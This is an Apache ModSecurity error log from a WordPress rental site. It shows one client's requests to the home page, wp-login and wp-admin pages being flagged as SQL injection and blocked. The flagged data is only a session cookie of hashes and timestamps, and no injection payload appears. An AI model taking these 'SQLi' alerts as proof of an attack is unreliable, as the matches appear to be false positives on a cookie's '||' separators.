[Mon May 11 18:28:31.816064 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDrzJnyuKVXoStDhbguwAAAEE"]
[Mon May 11 18:28:31.816791 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDrzJnyuKVXoStDhbguwAAAEE"]
[Mon May 11 18:28:33.106289 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDrzJnyuKVXoStDhbguwAAAEE"]
[Mon May 11 18:28:33.330498 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDsTJnyuKVXoStDhbgvAAAAEE"]
[Mon May 11 18:28:33.330826 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDsTJnyuKVXoStDhbgvAAAAEE"]
[Mon May 11 18:28:34.754878 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDsTJnyuKVXoStDhbgvAAAAEE"]
[Mon May 11 18:28:35.134780 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDszJnyuKVXoStDhbgvwAAAEE"], referer: https://www.google.com/
[Mon May 11 18:28:35.135111 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDszJnyuKVXoStDhbgvwAAAEE"], referer: https://www.google.com/
[Mon May 11 18:28:36.234356 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDszJnyuKVXoStDhbgvwAAAEE"], referer: https://www.google.com/
[Mon May 11 18:28:36.849202 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDtDJnyuKVXoStDhbgwAAAAEE"]
[Mon May 11 18:28:36.849528 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDtDJnyuKVXoStDhbgwAAAAEE"]
[Mon May 11 18:28:37.918134 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDtDJnyuKVXoStDhbgwAAAAEE"]
[Mon May 11 18:28:38.093829 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDtjJnyuKVXoStDhbgwgAAAEE"], referer: https://www.google.com/
[Mon May 11 18:28:38.094199 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIDtjJnyuKVXoStDhbgwgAAAEE"], referer: https://www.google.com/
[Mon May 11 18:28:39.228149 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDtjJnyuKVXoStDhbgwgAAAEE"], referer: https://www.google.com/
[Mon May 11 18:28:39.744350 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users"] [unique_id "agIDtzJnyuKVXoStDhbgxQAAAEE"], referer: https://t.co/
[Mon May 11 18:28:39.744768 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users"] [unique_id "agIDtzJnyuKVXoStDhbgxQAAAEE"], referer: https://t.co/
[Mon May 11 18:28:40.970550 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDtzJnyuKVXoStDhbgxQAAAEE"], referer: https://t.co/
[Mon May 11 18:28:41.118231 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDuTJnyuKVXoStDhbgxwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:41.118524 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDuTJnyuKVXoStDhbgxwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:42.087660 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDuTJnyuKVXoStDhbgxwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:42.204786 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDujJnyuKVXoStDhbgyQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:42.205072 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDujJnyuKVXoStDhbgyQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:42.960316 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDujJnyuKVXoStDhbgyQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:43.073212 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDuzJnyuKVXoStDhbgywAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:43.073506 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDuzJnyuKVXoStDhbgywAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:43.450449 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDuzJnyuKVXoStDhbgywAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:43.830480 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIDuzJnyuKVXoStDhbgzAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:43.830747 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIDuzJnyuKVXoStDhbgzAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:44.502631 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDuzJnyuKVXoStDhbgzAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:44.664414 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIDvDJnyuKVXoStDhbgzQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:44.664692 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIDvDJnyuKVXoStDhbgzQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:45.129555 2026] [authz_core:error] [pid 1411099:tid 1411122] [client 47.128.28.169:47156] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/Requests/src/error_log
[Mon May 11 18:28:45.272699 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDvDJnyuKVXoStDhbgzQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:45.700997 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIDvTJnyuKVXoStDhbgzwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:45.701285 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIDvTJnyuKVXoStDhbgzwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:46.410936 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDvTJnyuKVXoStDhbgzwAAAEE"], referer: https://rentparadise.fr/wp-login.php
